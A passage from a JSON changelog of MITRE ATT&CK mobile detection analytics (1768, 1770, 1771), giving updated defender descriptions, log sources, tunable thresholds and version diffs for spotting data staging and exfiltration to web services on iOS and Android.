                    "name": "Analytic 1768",
                    "description": "The defender correlates managed-app data access and lifecycle context with indirect evidence of packaging or encryption prior to outbound transfer. Because direct archive/compression visibility is generally weaker on iOS, the analytic anchors on app lifecycle state, file/output effects observable by mobile EDR where available, managed app role via MDM, and downstream network uploads that closely follow creation of new large or high-entropy local artifacts. Confidence is lower when only network effects are available.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "iOS:MDMLog",
                            "channel": "Supervised managed app without expected export, backup, or sync role performs local data staging behavior followed by opaque upload activity"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "Managed app enters background-capable execution or resumes processing immediately before archive-like file creation or upload behavior"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Application performs bulk data transformation or packaging-like processing on collected records prior to file creation or upload"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
                            "name": "MobileEDR:telemetry",
                            "channel": "Application writes new large container, temp package, or high-entropy blob after clustered local data access and before outbound communication"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between lifecycle event, local package creation, and upload"
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Managed apps expected to archive, export, or synchronize data"
                        },
                        {
                            "field": "AllowedDestinationList",
                            "description": "Approved cloud, enterprise, or sync endpoints for legitimate exports"
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Whether packaging or export should occur only during active user interaction"
                        },
                        {
                            "field": "ArchiveSizeThreshold",
                            "description": "Minimum size for suspicious local package or blob"
                        },
                        {
                            "field": "EntropyThreshold",
                            "description": "Threshold for identifying encrypted or compressed staged output"
                        },
                        {
                            "field": "UplinkBytesThreshold",
                            "description": "Minimum outbound volume consistent with recently created archive"
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_log_source_references']\": [{\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"iOS:MDMLog\", \"channel\": \"Supervised managed app without expected export, backup, or sync role performs local data staging behavior followed by opaque upload activity\"}, {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Managed app enters background-capable execution or resumes processing immediately before archive-like file creation or upload behavior\"}, {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Application performs bulk data transformation or packaging-like processing on collected records prior to file creation or upload\"}, {\"x_mitre_data_component_ref\": \"x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Application writes new large container, temp package, or high-entropy blob after clustered local data access and before outbound communication\"}], \"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between lifecycle event, local package creation, and upload\"}, {\"field\": \"AllowedAppList\", \"description\": \"Managed apps expected to archive, export, or synchronize data\"}, {\"field\": \"AllowedDestinationList\", \"description\": \"Approved cloud, enterprise, or sync endpoints for legitimate exports\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Whether packaging or export should occur only during active user interaction\"}, {\"field\": \"ArchiveSizeThreshold\", \"description\": \"Minimum size for suspicious local package or blob\"}, {\"field\": \"EntropyThreshold\", \"description\": \"Threshold for identifying encrypted or compressed staged output\"}, {\"field\": \"UplinkBytesThreshold\", \"description\": \"Minimum outbound volume consistent with recently created archive\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-08 18:29:03.808000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"The defender correlates managed-app data access and lifecycle context with indirect evidence of packaging or encryption prior to outbound transfer. Because direct archive/compression visibility is generally weaker on iOS, the analytic anchors on app lifecycle state, file/output effects observable by mobile EDR where available, managed app role via MDM, and downstream network uploads that closely follow creation of new large or high-entropy local artifacts. Confidence is lower when only network effects are available.\", \"old_value\": \"Many encryption mechanisms are built into standard application-accessible APIs and are therefore undetectable to the end user.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to127__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to127__0\"><a href=\"#difflib_chg_to127__top\">t</a></td><td class=\"diff_header\" id=\"from127_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Many&nbsp;encryption&nbsp;mechanisms&nbsp;are&nbsp;built&nbsp;into&nbsp;standard&nbsp;applicati</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to127__top\">t</a></td><td class=\"diff_header\" id=\"to127_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">The&nbsp;defender&nbsp;correlates&nbsp;managed-app&nbsp;data&nbsp;access&nbsp;and&nbsp;lifecycl</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">on-accessible&nbsp;APIs&nbsp;and&nbsp;are&nbsp;therefore&nbsp;undetectable&nbsp;to&nbsp;the&nbsp;end</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">e&nbsp;context&nbsp;with&nbsp;indirect&nbsp;evidence&nbsp;of&nbsp;packaging&nbsp;or&nbsp;encryption&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;user.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">prior&nbsp;to&nbsp;outbound&nbsp;transfer.&nbsp;Because&nbsp;direct&nbsp;archive/compressi</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">on&nbsp;visibility&nbsp;is&nbsp;generally&nbsp;weaker&nbsp;on&nbsp;iOS,&nbsp;the&nbsp;analytic&nbsp;ancho</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">rs&nbsp;on&nbsp;app&nbsp;lifecycle&nbsp;state,&nbsp;file/output&nbsp;effects&nbsp;observable&nbsp;by</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;mobile&nbsp;EDR&nbsp;where&nbsp;available,&nbsp;managed&nbsp;app&nbsp;role&nbsp;via&nbsp;MDM,&nbsp;and&nbsp;d</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ownstream&nbsp;network&nbsp;uploads&nbsp;that&nbsp;closely&nbsp;follow&nbsp;creation&nbsp;of&nbsp;ne</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">w&nbsp;large&nbsp;or&nbsp;high-entropy&nbsp;local&nbsp;artifacts.&nbsp;Confidence&nbsp;is&nbsp;lower</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;when&nbsp;only&nbsp;network&nbsp;effects&nbsp;are&nbsp;available.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--ab85ff40-2b75-477a-b5ec-f35f2fcde728",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-17 19:52:38.107000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0672#AN1770",
                            "external_id": "AN1770"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1770",
                    "description": "The defender correlates outbound communication from an application or service to legitimate external web platforms with mobile runtime context showing that the communication is inconsistent with the app's approved role, expected destinations, user interaction pattern, or device state. The strongest Android evidence is a managed or installed app communicating with cloud storage, social, messaging, code-hosting, or generic HTTPS web-service infrastructure shortly after background activation, protected-resource use, or local staging activity, especially when the device is locked, user interaction is absent, or the app's historical network baseline does not include that service class.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "VPN:MobileProxy",
                            "channel": "Application or device component communicates with legitimate external web-service infrastructure such as cloud storage, social media, messaging, collaboration, paste, code-hosting, CDN-backed API, or generic HTTPS service in a pattern inconsistent with the app's approved network baseline, timing, or service class"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "App communicating with external web service is backgrounded, persistent, recently awakened, or active while device is locked or without recent user interaction in a way inconsistent with expected app behavior"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
                            "name": "MobileEDR:telemetry",
                            "channel": "App stages, buffers, caches, or exports data locally immediately before communication with legitimate external web-service endpoints in a way inconsistent with normal sync or offline workflow"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "App uses Android framework behaviors associated with background work scheduling, network job execution, IPC/provider access, overlay or accessibility-like interaction, or unusual package visibility immediately adjacent to web-service communication"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "App communicating with legitimate web-service infrastructure is unmanaged, newly installed, recently updated, outside approved app list, or shows baseline drift in role, installer source, or expected capability profile"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window linking app state, resource use, staging activity, and web-service communication."
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Approved app identities and expected business roles vary by fleet and device group."
                        },
                        {
                            "field": "AllowedServiceClasses",
                            "description": "Some organizations legitimately use cloud storage, messaging, or collaboration services from mobile apps."
                        },
                        {
                            "field": "AllowedDestinations",
                            "description": "Expected domains, SNI values, CDNs, API endpoints, and redirectors vary by application and tenant."
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Certain apps may legitimately communicate only in foreground, while others support background sync."
                        },
                        {
                            "field": "RecentUserInteractionWindow",
                            "description": "Defines how close traffic must be to user activity to be considered expected."
                        },
                        {
                            "field": "BeaconIntervalTolerance",
                            "description": "Recurring connection periodicity thresholds vary with push, sync, and collaboration workloads."
                        },
                        {
                            "field": "UplinkBytesThreshold",
                            "description": "Data volume threshold for suspicious transfer to legitimate web-service infrastructure."
                        },
                        {
                            "field": "ExpectedBackgroundBehavior",
                            "description": "Normal background communication differs across app categories such as mail, chat, navigation, and security tools."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window linking app state, resource use, staging activity, and web-service communication.\"}, {\"field\": \"AllowedAppList\", \"description\": \"Approved app identities and expected business roles vary by fleet and device group.\"}, {\"field\": \"AllowedServiceClasses\", \"description\": \"Some organizations legitimately use cloud storage, messaging, or collaboration services from mobile apps.\"}, {\"field\": \"AllowedDestinations\", \"description\": \"Expected domains, SNI values, CDNs, API endpoints, and redirectors vary by application and tenant.\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Certain apps may legitimately communicate only in foreground, while others support background sync.\"}, {\"field\": \"RecentUserInteractionWindow\", \"description\": \"Defines how close traffic must be to user activity to be considered expected.\"}, {\"field\": \"BeaconIntervalTolerance\", \"description\": \"Recurring connection periodicity thresholds vary with push, sync, and collaboration workloads.\"}, {\"field\": \"UplinkBytesThreshold\", \"description\": \"Data volume threshold for suspicious transfer to legitimate web-service infrastructure.\"}, {\"field\": \"ExpectedBackgroundBehavior\", \"description\": \"Normal background communication differs across app categories such as mail, chat, navigation, and security tools.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-17 19:52:38.107000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"The defender correlates outbound communication from an application or service to legitimate external web platforms with mobile runtime context showing that the communication is inconsistent with the app's approved role, expected destinations, user interaction pattern, or device state. The strongest Android evidence is a managed or installed app communicating with cloud storage, social, messaging, code-hosting, or generic HTTPS web-service infrastructure shortly after background activation, protected-resource use, or local staging activity, especially when the device is locked, user interaction is absent, or the app's historical network baseline does not include that service class.\", \"old_value\": \"Application vetting services may provide a list of connections made or received by an application, or a list of domains contacted by the application.\\nMany properly configured firewalls may naturally block command and control traffic.\", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1 @@\\n-Application vetting services may provide a list of connections made or received by an application, or a list of domains contacted by the application.\\n-Many properly configured firewalls may naturally block command and control traffic.\\n+The defender correlates outbound communication from an application or service to legitimate external web platforms with mobile runtime context showing that the communication is inconsistent with the app's approved role, expected destinations, user interaction pattern, or device state. The strongest Android evidence is a managed or installed app communicating with cloud storage, social, messaging, code-hosting, or generic HTTPS web-service infrastructure shortly after background activation, protected-resource use, or local staging activity, especially when the device is locked, user interaction is absent, or the app's historical network baseline does not include that service class.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"VPN:MobileProxy\", \"channel\": \"Application or device component communicates with legitimate external web-service infrastructure such as cloud storage, social media, messaging, collaboration, paste, code-hosting, CDN-backed API, or generic HTTPS service in a pattern inconsistent with the app's approved network baseline, timing, or service class\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--764ee29e-48d6-4934-8e6b-7a606aaaafc0\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"App communicating with external web service is backgrounded, persistent, recently awakened, or active while device is locked or without recent user interaction in a way inconsistent with expected app behavior\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba\", \"name\": \"Network Traffic\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"App stages, buffers, caches, or exports data locally immediately before communication with legitimate external web-service endpoints in a way inconsistent with normal sync or offline workflow\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"App uses Android framework behaviors associated with background work scheduling, network job execution, IPC/provider access, overlay or accessibility-like interaction, or unusual package visibility immediately adjacent to web-service communication\"}, \"root['x_mitre_log_source_references'][4]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"App communicating with legitimate web-service infrastructure is unmanaged, newly installed, recently updated, outside approved app list, or shows baseline drift in role, installer source, or expected capability profile\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to177__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to177__0\"><a href=\"#difflib_chg_to177__top\">t</a></td><td class=\"diff_header\" id=\"from177_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Application&nbsp;vetting&nbsp;services&nbsp;may&nbsp;provide&nbsp;a&nbsp;list&nbsp;of&nbsp;connectio</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to177__top\">t</a></td><td class=\"diff_header\" id=\"to177_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">The&nbsp;defender&nbsp;correlates&nbsp;outbound&nbsp;communication&nbsp;from&nbsp;an&nbsp;appli</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ns&nbsp;made&nbsp;or&nbsp;received&nbsp;by&nbsp;an&nbsp;application,&nbsp;or&nbsp;a&nbsp;list&nbsp;of&nbsp;domains&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">cation&nbsp;or&nbsp;service&nbsp;to&nbsp;legitimate&nbsp;external&nbsp;web&nbsp;platforms&nbsp;with&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">contacted&nbsp;by&nbsp;the&nbsp;application.&nbsp;Many&nbsp;properly&nbsp;configured&nbsp;firew</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">mobile&nbsp;runtime&nbsp;context&nbsp;showing&nbsp;that&nbsp;the&nbsp;communication&nbsp;is&nbsp;inc</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">alls&nbsp;may&nbsp;naturally&nbsp;block&nbsp;command&nbsp;and&nbsp;control&nbsp;traffic.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">onsistent&nbsp;with&nbsp;the&nbsp;app's&nbsp;approved&nbsp;role,&nbsp;expected&nbsp;destination</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">s,&nbsp;user&nbsp;interaction&nbsp;pattern,&nbsp;or&nbsp;device&nbsp;state.&nbsp;The&nbsp;strongest&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">Android&nbsp;evidence&nbsp;is&nbsp;a&nbsp;managed&nbsp;or&nbsp;installed&nbsp;app&nbsp;communicating</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;with&nbsp;cloud&nbsp;storage,&nbsp;social,&nbsp;messaging,&nbsp;code-hosting,&nbsp;or&nbsp;gen</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">eric&nbsp;HTTPS&nbsp;web-service&nbsp;infrastructure&nbsp;shortly&nbsp;after&nbsp;backgrou</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">nd&nbsp;activation,&nbsp;protected-resource&nbsp;use,&nbsp;or&nbsp;local&nbsp;staging&nbsp;acti</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">vity,&nbsp;especially&nbsp;when&nbsp;the&nbsp;device&nbsp;is&nbsp;locked,&nbsp;user&nbsp;interaction</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;is&nbsp;absent,&nbsp;or&nbsp;the&nbsp;app's&nbsp;historical&nbsp;network&nbsp;baseline&nbsp;does&nbsp;no</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">t&nbsp;include&nbsp;that&nbsp;service&nbsp;class.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--a0bb0e33-c40f-46f5-b64a-07faa6946d83",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-17 20:24:52.509000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0672#AN1771",
                            "external_id": "AN1771"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1771",
                    "description": "The defender correlates communication to legitimate external web-service platforms with supervised managed-app context and device-state information showing that the traffic is inconsistent with the app's expected role, background-refresh profile, or user interaction timing. On iOS, the strongest reliable evidence is network telemetry tied to a managed app or device plus app state and supervision context, especially when traffic to social, collaboration, cloud-storage, or generic HTTPS platforms occurs shortly after background activity, while the device is locked, or without expected user-driven foreground execution. Direct low-level framework visibility is weaker than Android, so primary analytic confidence should be anchored to supervised app context plus network behavior rather than assumed host-level proof.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "VPN:MobileProxy",
                            "channel": "Supervised device or managed app communicates with legitimate external web-service infrastructure such as cloud storage, messaging, collaboration, social, paste, or generic HTTPS API platforms in a pattern inconsistent with expected service baseline, managed app role, or normal background refresh behavior"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "Managed app shows background activity, refresh, or lock-state-adjacent execution temporally aligned to web-service communication without expected foreground use or recent user interaction"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "iOS:MDMLog",
                            "channel": "Managed app communicating with legitimate web-service infrastructure is newly installed, recently updated, outside expected managed-app set, or displays baseline drift in app role, release path, or business justification"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "iOS:unifiedlog",
                            "channel": "Supplemental launch, background task, networking, or extension-handling anomalies occur temporally adjacent to suspicious web-service communication from a managed app or supervised device"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between app state changes and communication with legitimate web-service infrastructure."
                        },
                        {
                            "field": "SupervisedRequired",
                            "description": "Strongest app context and managed state analytics depend on supervised iOS devices."
                        },
                        {
                            "field": "AllowedManagedApps",
                            "description": "Approved managed apps and expected business use vary by organization and device profile."
                        },
                        {
                            "field": "AllowedServiceClasses",
                            "description": "Some managed apps legitimately communicate with collaboration, cloud-storage, or messaging services."
                        },
                        {
                            "field": "AllowedDestinations",
                            "description": "Expected Apple, enterprise, SaaS, CDN, and API destinations vary by app and tenant."
                        },
                        {
                            "field": "BackgroundRefreshBaseline",
                            "description": "Normal background network behavior differs across mail, chat, navigation, and enterprise apps."
                        },
                        {
                            "field": "RecentUserInteractionWindow",
                            "description": "Defines how close traffic must be to user activity to be considered expected."
                        },
                        {
                            "field": "BeaconIntervalTolerance",
                            "description": "Allowed periodicity for sync, push, and refresh traffic varies across app categories."
                        },
                        {
                            "field": "UplinkBytesThreshold",
                            "description": "Threshold for suspicious transfer volume to legitimate web-service platforms."
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between app state changes and communication with legitimate web-service infrastructure.\"}, {\"field\": \"SupervisedRequired\", \"description\": \"Strongest app context and managed state analytics depend on supervised iOS devices.\"}, {\"field\": \"AllowedManagedApps\", \"description\": \"Approved managed apps and expected business use vary by organization and device profile.\"}, {\"field\": \"AllowedServiceClasses\", \"description\": \"Some managed apps legitimately communicate with collaboration, cloud-storage, or messaging services.\"}, {\"field\": \"AllowedDestinations\", \"description\": \"Expected Apple, enterprise, SaaS, CDN, and API destinations vary by app and tenant.\"}, {\"field\": \"BackgroundRefreshBaseline\", \"description\": \"Normal background network behavior differs across mail, chat, navigation, and enterprise apps.\"}, {\"field\": \"RecentUserInteractionWindow\", \"description\": \"Defines how close traffic must be to user activity to be considered expected.\"}, {\"field\": \"BeaconIntervalTolerance\", \"description\": \"Allowed periodicity for sync, push, and refresh traffic varies across app categories.\"}, {\"field\": \"UplinkBytesThreshold\", \"description\": \"Threshold for suspicious transfer volume to legitimate web-service platforms.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-17 20:24:52.509000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"The defender correlates communication to legitimate external web-service platforms with supervised managed-app context and device-state information showing that the traffic is inconsistent with the app's expected role, background-refresh profile, or user interaction timing. On iOS, the strongest reliable evidence is network telemetry tied to a managed app or device plus app state and supervision context, especially when traffic to social, collaboration, cloud-storage, or generic HTTPS platforms occurs shortly after background activity, while the device is locked, or without expected user-driven foreground execution. Direct low-level framework visibility is weaker than Android, so primary analytic confidence should be anchored to supervised app context plus network behavior rather than assumed host-level proof.\", \"old_value\": \"Application vetting services may provide a list of connections made or received by an application, or a list of domains contacted by the application.\\nMany properly configured firewalls may naturally block command and control traffic.\", 